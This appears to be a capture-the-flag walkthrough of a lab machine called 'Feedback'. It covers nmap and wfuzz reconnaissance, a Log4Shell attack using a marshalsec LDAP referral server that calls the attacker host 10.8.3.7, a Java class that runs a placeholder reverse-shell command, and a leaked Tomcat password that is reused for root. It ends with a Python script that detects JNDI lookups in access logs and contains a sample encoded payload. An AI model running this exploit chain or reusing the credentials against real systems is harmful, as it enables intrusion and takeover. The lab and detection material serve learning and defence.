Feedback VL

NMAP Scanning:

└─$ nmap -A -sC -sV -p22,8080 10.10.127.134 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 14:44 EST
Nmap scan report for 10.10.127.134
Host is up (0.039s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 63:ef:9d:79:12:a0:1a:08:92:8e:0d:b7:4a:7d:b2:7d (RSA)
| 256 f8:bf:ad:21:f1:6b:e1:c8:dc:29:78:65:55:69:7e:37 (ECDSA)
|_ 256 5d:56:d6:44:26:c2:da:53:73:62:77:3a:78:d4:11:65 (ED25519)
8080/tcp open http Apache Tomcat 9.0.56
|_http-title: Apache Tomcat/9.0.56
|_http-favicon: Apache Tomcat
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 41.85 ms 10.8.0.1
2 41.97 ms 10.10.127.134

PORT 8080 - Directory Listing:

└─$ wfuzz -u http://10.10.127.134:8080/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 68
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://10.10.127.134:8080/FUZZ
Total requests: 220559

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000001: 200 198 L 490 W 11136 Ch "# directory-list-2.3-medium.txt"
000000007: 200 198 L 490 W 11136 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000003: 200 198 L 490 W 11136 Ch "# Copyright 2007 James Fisher"
000000014: 200 198 L 490 W 11136 Ch "http://10.10.127.134:8080/"
000000013: 200 198 L 490 W 11136 Ch "#"
000000012: 200 198 L 490 W 11136 Ch "# on at least 2 different hosts"
000000011: 200 198 L 490 W 11136 Ch "# Priority ordered case-sensitive list, where entries were found"
000000010: 200 198 L 490 W 11136 Ch "#"
000000009: 200 198 L 490 W 11136 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000006: 200 198 L 490 W 11136 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000004: 200 198 L 490 W 11136 Ch "#"
000000005: 200 198 L 490 W 11136 Ch "# This work is licensed under the Creative Commons"
000000002: 200 198 L 490 W 11136 Ch "#"
000000008: 200 198 L 490 W 11136 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000090: 302 0 L 0 W 0 Ch "docs"
000000141: 302 0 L 0 W 0 Ch "feedback"
000000902: 302 0 L 0 W 0 Ch "examples"
000004889: 302 0 L 0 W 0 Ch "manager"

Among the usual Tomcat paths (docs, examples, manager) there is one endpoint that does not belong to a stock Tomcat install: feedback. Let's check it:

In the source code we can see the following comment:

<!-- Build with Java, Struts2 & Log4J -->

Searching for Log4j shows that there was a very well-known CVE in it, so plenty of exploits and automated setups exist, for example: https://github.com/kozmer/log4j-shell-poc?tab=readme-ov-file

This GitHub project needs a specific Java version; to download it without logging in to Oracle we can use the following converter: https://sites.google.com/view/java-se-download-url-converter/

Alternatively, we can do it manually with the following commands. First the LDAP referral server:

└─$ java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.8.3.7/#Exploit"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Listening on 0.0.0.0:1389
Send LDAP reference result for Exploit redirecting to http://10.8.3.7/Exploit.class
Then an HTTP server that serves the class the LDAP reference points to:

python3 -m http.server 80 (serving Exploit.class and Exploit.java)

Exploit.java:

public class Exploit {
    // Static initializer: runs as soon as the class is loaded by the
    // target's JVM, before any instance is created.
    static {
        try {
            java.lang.Runtime.getRuntime().exec("REVERSE SHELL ...");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Compile: javac Exploit.java -source 8 -target 8

After triggering the lookup through the feedback form we get a shell as the tomcat user, and the Tomcat configuration holds credentials in clear text:

tomcat@ip-10-10-10-7:~/conf$ cat tomcat-users.xml
cat tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<user username="admin" password="H2RR3rGDrbAnPxWa" roles="manager-gui"/>
<user username="robot" password="H2RR3rGDrbAnPxWa" roles="manager-script"/>

</tomcat-users>
tomcat@ip-10-10-10-7:~/conf$

The password we just found is reused for root: su - root with it and get the flag!
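The other side of the Log4j step above is spotting it. As an added example that is not part of the original writeup, here is a small Python triage script that flags Tomcat access-log lines carrying a Log4j ${jndi:...} lookup, decoding URL encoding first so an encoded payload does not slip past the pattern. The log lines and the 198.51.100.7 host are constructed for the example.

```python
import re
from urllib.parse import unquote

# Explicit JNDI lookup with a remote scheme: high-confidence exploitation attempt.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns)\s*:", re.IGNORECASE)
# Any other ${...} lookup in user-supplied input: never legitimate, worth a look.
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")


def classify(line: str) -> str:
    """Return 'jndi', 'lookup' or '' (benign) for one access-log line.

    Decodes twice so double-encoded input (%2524 -> %24 -> $) is still caught.
    """
    decoded = unquote(unquote(line))
    if JNDI_LOOKUP.search(decoded):
        return "jndi"
    if ANY_LOOKUP.search(decoded):
        return "lookup"
    return ""


# Constructed sample lines in Tomcat's "common" access-log shape (not from the target).
SAMPLE_LOG = [
    '10.8.0.5 - - [10/Feb/2025:14:50:01 -0500] "GET /feedback HTTP/1.1" 200 11136',
    '10.8.0.5 - - [10/Feb/2025:14:51:12 -0500] "GET /feedback?name=%24%7Bjndi%3Aldap%3A%2F%2F'
    '198.51.100.7%3A1389%2FExploit%7D HTTP/1.1" 200 11136',
    '10.8.0.5 - - [10/Feb/2025:14:51:40 -0500] "GET /feedback?name=${java:version} HTTP/1.1" 200 11136',
    '10.8.0.5 - - [10/Feb/2025:14:52:30 -0500] "GET /docs/?q=price+is+$10 HTTP/1.1" 200 5123',
]


def scan(lines):
    """Return (line_number, verdict, decoded_line) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict, unquote(unquote(line))))
    return hits


if __name__ == "__main__":
    for n, verdict, text in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}: {text}")
```

A POST body (the feedback form itself) is not in the access log, so pair this with application-level logging or an outbound LDAP/RMI egress alert from the Tomcat host.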